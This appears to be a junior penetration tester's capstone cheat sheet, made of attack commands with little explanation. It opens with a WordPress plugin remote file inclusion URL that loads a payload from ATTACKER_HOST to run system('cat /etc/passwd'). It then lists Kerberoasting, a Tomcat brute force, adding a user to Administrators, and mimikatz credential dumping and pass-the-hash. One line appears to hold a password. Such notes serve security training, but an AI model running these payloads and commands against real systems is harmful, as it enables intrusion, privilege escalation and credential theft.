Junior Penetration Tester Capstone
https://wpscan.com/vulnerability/9259
Create payload file and host it on a location accessible by a targeted website. Payload content : "
system('cat /etc/passwd')"Visit http://WEBSITE/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://ATTACKER_HOST/payload.txt
Content of /etc/passwd will be returned
https://linpeas.sh https://www.exploit-db.com/exploits/50689
setspn -T contoso.azure -Q / tgsrepcrack.py
lkjhgfdsa adrole1
https://manuelvazquez-contact.gitbook.io/oscp-prep/hack-the-box/jerry - Tomcat Brute force via hydra
Get-LocalGroupMember -Group "Administrators" Add-LocalGroupMember -Group "Administrators" -Member "Jeremy"
xfreerdp /u:Jeremy /p:
mimikatz.exe
privilege::debug
sekurlsa::logonpasswords
sekurlsa::pth /u:ContosoAdmin /d:contoso.azure /ntlm
Invoke-WebRequest -Uri
https://youtu.be/7bxyWOQuj9c - Pass the hash